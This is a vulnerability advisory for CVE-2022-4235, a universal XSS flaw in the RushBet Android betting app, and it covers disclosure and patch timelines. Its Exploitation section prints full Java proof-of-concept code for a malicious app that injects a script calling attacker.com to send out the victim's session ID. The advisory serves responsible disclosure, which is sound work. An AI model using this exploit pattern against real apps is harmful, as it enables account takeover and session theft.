Headline
CVE-2022-4235: RushBet 2022.23.1-b490616d - Universal XSS | Advisories | Fluid Attacks
RushBet version 2022.23.1-b490616d allows a remote attacker to steal customer accounts via use of a malicious application. This is possible because the application exposes an activity and does not properly validate the data it receives.
Summary
Name
RushBet 2022.23.1-b490616d - UXSS
Code name
Miller
Product
RushBet
Affected versions
Version 2022.23.1-b490616d
State
Public
Release date
2023-01-10
Vulnerability
Kind
Universal XSS
Rule
429. Universal XSS (UXSS)
Remote
Yes
CVSSv3 Vector
CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:N
CVSSv3 Base Score
6.0
Exploit available
Yes
CVE ID(s)
CVE-2022-4235
Description
RushBet version 2022.23.1-b490616d allows a remote attacker to steal customer accounts via use of a malicious application. This is possible because the application exposes an activity and does not properly validate the data it receives.
Vulnerability
This vulnerability occurs because the application exposes an activity and does not properly validate the data it receives.
Exploitation
To exploit this vulnerability, the victim must have a malicious application installed with activity like the following:
MainActivity.java
package com.example.badapp;
import androidx.appcompat.app.AppCompatActivity;
import android.content.Intent;
import android.os.Handler;
import android.os.Bundle;
import android.net.Uri;
public class MainActivity extends AppCompatActivity {
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
Intent intent = new Intent("android.intent.action.VIEW");
intent.setClassName("com.rush.co.rb","com.sugarhouse.casino.MainActivity");
intent.setData(Uri.parse("https://rushbet.co/"));
startActivity(intent);
new Handler().postDelayed(() -> {
intent.setAction("Action.EvaluateScript");
intent.putExtra("KeyScript","fetch('https://attacker.com/sessionID/'+JSON.parse(sessionStorage.getItem('session-COP')).value);");
startActivity(intent);
}, 30000);
}
}
Thus, when the victim opens the malicious app, the exploit will be executed, thus hacking his account.
Evidence of exploitation
POC-Account-Takeover-Rushbet
Our security policy
We have reserved the CVE-2022-4235 to refer to this issue from now on.
- https://fluidattacks.com/advisories/policy/
System Information
Version: RushBet 2022.23.1-b490616d
Operating System: GNU/Linux
Mitigation
An updated version of RushBet is available at the vendor page.
Credits
The vulnerability was discovered by Carlos Bello from Fluid Attacks’ Offensive Team.
References
Vendor page https://www.rushbet.co
Timeline
2022-11-29
Vulnerability discovered.
2022-11-30
Vendor contacted.
2022-12-03
Vendor replied acknowledging the report.
2022-12-03
Vendor Confirmed the vulnerability.
2022-12-14
Vulnerability patched.
2023-01-10
Public Disclosure.